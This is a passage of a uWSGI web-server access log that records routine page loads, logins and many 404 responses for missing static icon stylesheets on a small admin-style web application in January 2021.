Jan 14 10:45:52 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 11057|app: 0|req: 1348/1695] 180.160.49.168 () {38 vars in 840 bytes} [Thu Jan 14 10:45:52 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 11057|app: 0|req: 1349/1696] 180.160.49.168 () {38 vars in 824 bytes} [Thu Jan 14 10:45:52 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 11057|app: 0|req: 1350/1697] 180.160.49.168 () {38 vars in 824 bytes} [Thu Jan 14 10:45:52 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 27 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 11057|app: 0|req: 1351/1698] 180.160.49.168 () {38 vars in 880 bytes} [Thu Jan 14 10:45:52 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 11057|app: 0|req: 1352/1699] 180.160.49.168 () {38 vars in 772 bytes} [Thu Jan 14 10:45:52 2021] GET /static/css/spinners.css => generated 3516 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 11057|app: 0|req: 1353/1700] 180.160.49.168 () {38 vars in 770 bytes} [Thu Jan 14 10:45:52 2021] GET /static/css/animate.css => generated 3513 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 1355/1701] 180.160.49.168 () {40 vars in 895 bytes} [Thu Jan 14 10:46:22 2021] GET /kind-manage/? => generated 6423 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 1355/1702] 180.160.49.168 () {48 vars in 977 bytes} [Thu Jan 14 10:46:22 2021] POST /kind-manage/ => generated 27 bytes in 14 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 11057|app: 0|req: 1356/1703] 180.160.49.168 () {38 vars in 836 bytes} [Thu Jan 14 10:46:22 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 11057|app: 0|req: 1357/1704] 180.160.49.168 () {38 vars in 840 bytes} [Thu Jan 14 10:46:22 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 11057|app: 0|req: 1358/1705] 180.160.49.168 () {38 vars in 848 bytes} [Thu Jan 14 10:46:22 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 11057|app: 0|req: 1359/1706] 180.160.49.168 () {38 vars in 804 bytes} [Thu Jan 14 10:46:22 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 11057|app: 0|req: 1360/1707] 180.160.49.168 () {38 vars in 824 bytes} [Thu Jan 14 10:46:22 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 11057|app: 0|req: 1361/1708] 180.160.49.168 () {38 vars in 824 bytes} [Thu Jan 14 10:46:22 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 35 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 11057|app: 0|req: 1362/1709] 180.160.49.168 () {38 vars in 880 bytes} [Thu Jan 14 10:46:22 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 11057|app: 0|req: 1363/1710] 180.160.49.168 () {38 vars in 772 bytes} [Thu Jan 14 10:46:22 2021] GET /static/css/spinners.css => generated 3516 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 11057|app: 0|req: 1364/1711] 180.160.49.168 () {38 vars in 770 bytes} [Thu Jan 14 10:46:22 2021] GET /static/css/animate.css => generated 3513 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 1365/1712] 180.160.49.168 () {40 vars in 895 bytes} [Thu Jan 14 10:46:25 2021] GET /kind-manage/ => generated 7365 bytes in 11 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 11057|app: 0|req: 1366/1713] 180.160.49.168 () {38 vars in 836 bytes} [Thu Jan 14 10:46:25 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 11057|app: 0|req: 1367/1714] 180.160.49.168 () {38 vars in 848 bytes} [Thu Jan 14 10:46:25 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 11057|app: 0|req: 1368/1715] 180.160.49.168 () {38 vars in 840 bytes} [Thu Jan 14 10:46:25 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 11057|app: 0|req: 1369/1716] 180.160.49.168 () {38 vars in 804 bytes} [Thu Jan 14 10:46:25 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 11057|app: 0|req: 1370/1717] 180.160.49.168 () {38 vars in 824 bytes} [Thu Jan 14 10:46:25 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 11057|app: 0|req: 1371/1718] 180.160.49.168 () {38 vars in 824 bytes} [Thu Jan 14 10:46:25 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 25 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 11057|app: 0|req: 1372/1719] 180.160.49.168 () {38 vars in 880 bytes} [Thu Jan 14 10:46:25 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 11057|app: 0|req: 1373/1720] 180.160.49.168 () {38 vars in 772 bytes} [Thu Jan 14 10:46:25 2021] GET /static/css/spinners.css => generated 3516 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 11057|app: 0|req: 1374/1721] 180.160.49.168 () {38 vars in 770 bytes} [Thu Jan 14 10:46:25 2021] GET /static/css/animate.css => generated 3513 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 11057|app: 0|req: 1376/1722] 180.160.49.168 () {48 vars in 976 bytes} [Thu Jan 14 10:47:01 2021] POST /kind-manage/ => generated 27 bytes in 23 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 1) +[pid: 11057|app: 0|req: 1376/1723] 180.160.49.168 () {40 vars in 894 bytes} [Thu Jan 14 10:47:01 2021] GET /kind-manage/? => generated 8310 bytes in 35 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 1377/1724] 180.160.49.168 () {40 vars in 893 bytes} [Thu Jan 14 10:47:02 2021] GET /kind-manage/ => generated 8310 bytes in 10 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 11057|app: 0|req: 1378/1725] 180.160.49.168 () {38 vars in 835 bytes} [Thu Jan 14 10:47:02 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 11057|app: 0|req: 1379/1726] 180.160.49.168 () {38 vars in 847 bytes} [Thu Jan 14 10:47:02 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 11057|app: 0|req: 1380/1727] 180.160.49.168 () {38 vars in 839 bytes} [Thu Jan 14 10:47:02 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 11057|app: 0|req: 1381/1728] 180.160.49.168 () {38 vars in 803 bytes} [Thu Jan 14 10:47:02 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 11057|app: 0|req: 1382/1729] 180.160.49.168 () {38 vars in 823 bytes} [Thu Jan 14 10:47:02 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 11057|app: 0|req: 1383/1730] 180.160.49.168 () {38 vars in 769 bytes} [Thu Jan 14 10:47:02 2021] GET /static/css/animate.css => generated 3513 bytes in 35 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 11057|app: 0|req: 1384/1731] 180.160.49.168 () {38 vars in 823 bytes} [Thu Jan 14 10:47:02 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 11057|app: 0|req: 1385/1732] 180.160.49.168 () {38 vars in 879 bytes} [Thu Jan 14 10:47:02 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 11057|app: 0|req: 1386/1733] 180.160.49.168 () {38 vars in 771 bytes} [Thu Jan 14 10:47:02 2021] GET /static/css/spinners.css => generated 3516 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 11057|app: 0|req: 1387/1734] 219.228.146.135 () {38 vars in 865 bytes} [Thu Jan 14 10:47:32 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 11057|app: -1|req: -1/1735] 219.228.146.135 () {40 vars in 865 bytes} [Thu Jan 14 10:47:32 2021] GET /static/css/bootstrap.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 11057|app: -1|req: -1/1736] 219.228.146.135 () {40 vars in 887 bytes} [Thu Jan 14 10:47:32 2021] GET /static/css/bootstrap-responsive.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 11057|app: -1|req: -1/1737] 219.228.146.135 () {40 vars in 869 bytes} [Thu Jan 14 10:47:32 2021] GET /static/css/prettyPhoto.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 11057|app: -1|req: -1/1738] 219.228.146.135 () {40 vars in 867 bytes} [Thu Jan 14 10:47:32 2021] GET /static/css/flexslider.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 11057|app: -1|req: -1/1739] 219.228.146.135 () {40 vars in 873 bytes} [Thu Jan 14 10:47:32 2021] GET /static/css/custom-styles.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 11057|app: -1|req: -1/1740] 219.228.146.135 () {40 vars in 848 bytes} [Thu Jan 14 10:47:32 2021] GET /static/js/jquery.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 11057|app: -1|req: -1/1741] 219.228.146.135 () {40 vars in 845 bytes} [Thu Jan 14 10:47:32 2021] GET /static/js/bootstrap.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 11057|app: -1|req: -1/1742] 219.228.146.135 () {40 vars in 864 bytes} [Thu Jan 14 10:47:33 2021] GET /static/js/jquery.prettyPhoto.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 11057|app: -1|req: -1/1743] 219.228.146.135 () {40 vars in 862 bytes} [Thu Jan 14 10:47:33 2021] GET /static/js/jquery.flexslider.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 11057|app: -1|req: -1/1744] 219.228.146.135 () {40 vars in 854 bytes} [Thu Jan 14 10:47:33 2021] GET /static/js/jquery.custom.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 11057|app: -1|req: -1/1745] 219.228.146.135 () {40 vars in 908 bytes} [Thu Jan 14 10:47:33 2021] GET /static/img/page-bg-1.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 11057|app: 0|req: 1389/1746] 180.160.49.168 () {40 vars in 895 bytes} [Thu Jan 14 10:47:38 2021] GET /kind-manage/? => generated 8310 bytes in 17 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 1389/1747] 180.160.49.168 () {48 vars in 977 bytes} [Thu Jan 14 10:47:38 2021] POST /kind-manage/ => generated 27 bytes in 18 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 11057|app: 0|req: 1390/1748] 180.160.49.168 () {38 vars in 836 bytes} [Thu Jan 14 10:47:38 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 11057|app: 0|req: 1391/1749] 180.160.49.168 () {38 vars in 804 bytes} [Thu Jan 14 10:47:38 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 11057|app: 0|req: 1392/1750] 180.160.49.168 () {38 vars in 840 bytes} [Thu Jan 14 10:47:38 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 12 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 11057|app: 0|req: 1393/1751] 180.160.49.168 () {38 vars in 824 bytes} [Thu Jan 14 10:47:38 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 11057|app: 0|req: 1394/1752] 180.160.49.168 () {38 vars in 824 bytes} [Thu Jan 14 10:47:38 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 11057|app: 0|req: 1395/1753] 180.160.49.168 () {38 vars in 848 bytes} [Thu Jan 14 10:47:38 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 32 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 11057|app: 0|req: 1396/1754] 180.160.49.168 () {38 vars in 880 bytes} [Thu Jan 14 10:47:38 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 11057|app: 0|req: 1397/1755] 180.160.49.168 () {38 vars in 772 bytes} [Thu Jan 14 10:47:38 2021] GET /static/css/spinners.css => generated 3516 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 11057|app: 0|req: 1398/1756] 180.160.49.168 () {38 vars in 770 bytes} [Thu Jan 14 10:47:38 2021] GET /static/css/animate.css => generated 3513 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 1399/1757] 219.228.146.135 () {40 vars in 921 bytes} [Thu Jan 14 10:47:38 2021] GET /my-admin/ => generated 5366 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 1400/1758] 219.228.146.135 () {48 vars in 1018 bytes} [Thu Jan 14 10:47:42 2021] POST /my-admin/ => generated 27 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 1401/1759] 219.228.146.135 () {40 vars in 928 bytes} [Thu Jan 14 10:47:42 2021] GET /admin-home/ => generated 6515 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 11057|app: -1|req: -1/1760] 219.228.146.135 () {40 vars in 928 bytes} [Thu Jan 14 10:47:42 2021] GET /static/assets/plugins/bootstrap/css/bootstrap.min.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 11057|app: -1|req: -1/1761] 219.228.146.135 () {40 vars in 862 bytes} [Thu Jan 14 10:47:42 2021] GET /static/css/style.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 11057|app: -1|req: -1/1762] 219.228.146.135 () {40 vars in 874 bytes} [Thu Jan 14 10:47:42 2021] GET /static/css/colors/blue.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 11057|app: -1|req: -1/1763] 219.228.146.135 () {40 vars in 891 bytes} [Thu Jan 14 10:47:42 2021] GET /static/assets/plugins/jquery/jquery.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 11057|app: -1|req: -1/1764] 219.228.146.135 () {40 vars in 903 bytes} [Thu Jan 14 10:47:42 2021] GET /static/assets/plugins/bootstrap/js/tether.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 11057|app: -1|req: -1/1765] 219.228.146.135 () {40 vars in 909 bytes} [Thu Jan 14 10:47:42 2021] GET /static/assets/plugins/bootstrap/js/bootstrap.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 11057|app: 0|req: 1402/1766] 219.228.146.135 () {38 vars in 886 bytes} [Thu Jan 14 10:47:42 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 11057|app: 0|req: 1403/1767] 219.228.146.135 () {38 vars in 898 bytes} [Thu Jan 14 10:47:42 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 11057|app: 0|req: 1404/1768] 219.228.146.135 () {38 vars in 890 bytes} [Thu Jan 14 10:47:42 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 11057|app: 0|req: 1405/1769] 219.228.146.135 () {38 vars in 874 bytes} [Thu Jan 14 10:47:42 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 11057|app: 0|req: 1406/1770] 219.228.146.135 () {38 vars in 874 bytes} [Thu Jan 14 10:47:42 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 11057|app: 0|req: 1407/1771] 219.228.146.135 () {38 vars in 854 bytes} [Thu Jan 14 10:47:42 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 23 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 11057|app: 0|req: 1408/1772] 219.228.146.135 () {38 vars in 822 bytes} [Thu Jan 14 10:47:42 2021] GET /static/css/spinners.css => generated 3516 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 11057|app: 0|req: 1409/1773] 219.228.146.135 () {38 vars in 820 bytes} [Thu Jan 14 10:47:42 2021] GET /static/css/animate.css => generated 3513 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 11057|app: 0|req: 1410/1774] 219.228.146.135 () {38 vars in 930 bytes} [Thu Jan 14 10:47:42 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 11057|app: -1|req: -1/1775] 219.228.146.135 () {40 vars in 843 bytes} [Thu Jan 14 10:47:42 2021] GET /static/js/waves.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 11057|app: -1|req: -1/1776] 219.228.146.135 () {40 vars in 855 bytes} [Thu Jan 14 10:47:42 2021] GET /static/js/sidebarmenu.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 11057|app: -1|req: -1/1777] 219.228.146.135 () {40 vars in 931 bytes} [Thu Jan 14 10:47:42 2021] GET /static/assets/plugins/sticky-kit-master/dist/sticky-kit.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 11057|app: 0|req: 1411/1778] 180.160.49.168 () {40 vars in 895 bytes} [Thu Jan 14 10:47:43 2021] GET /kind-manage/ => generated 9252 bytes in 12 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 11057|app: 0|req: 1412/1779] 180.160.49.168 () {38 vars in 836 bytes} [Thu Jan 14 10:47:43 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 11057|app: -1|req: -1/1780] 219.228.146.135 () {40 vars in 867 bytes} [Thu Jan 14 10:47:43 2021] GET /static/js/jquery.slimscroll.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 11057|app: -1|req: -1/1781] 219.228.146.135 () {40 vars in 927 bytes} [Thu Jan 14 10:47:43 2021] GET /static/assets/plugins/styleswitcher/jQuery.style.switcher.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 11057|app: -1|req: -1/1782] 219.228.146.135 () {40 vars in 853 bytes} [Thu Jan 14 10:47:43 2021] GET /static/js/custom.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 11057|app: 0|req: 1413/1783] 180.160.49.168 () {38 vars in 848 bytes} [Thu Jan 14 10:47:43 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 11057|app: 0|req: 1414/1784] 180.160.49.168 () {38 vars in 804 bytes} [Thu Jan 14 10:47:43 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 11057|app: 0|req: 1415/1785] 180.160.49.168 () {38 vars in 824 bytes} [Thu Jan 14 10:47:43 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 11057|app: 0|req: 1416/1786] 180.160.49.168 () {38 vars in 772 bytes} [Thu Jan 14 10:47:43 2021] GET /static/css/spinners.css => generated 3516 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 11057|app: 0|req: 1417/1787] 180.160.49.168 () {38 vars in 840 bytes} [Thu Jan 14 10:47:43 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 18 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 11057|app: 0|req: 1418/1788] 180.160.49.168 () {38 vars in 824 bytes} [Thu Jan 14 10:47:43 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 11057|app: 0|req: 1419/1789] 180.160.49.168 () {38 vars in 880 bytes} [Thu Jan 14 10:47:43 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 11057|app: 0|req: 1420/1790] 180.160.49.168 () {38 vars in 770 bytes} [Thu Jan 14 10:47:43 2021] GET /static/css/animate.css => generated 3513 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 11057|app: 0|req: 1421/1791] 219.228.146.135 () {40 vars in 934 bytes} [Thu Jan 14 10:47:45 2021] GET /announcement/ => generated 7421 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 11057|app: 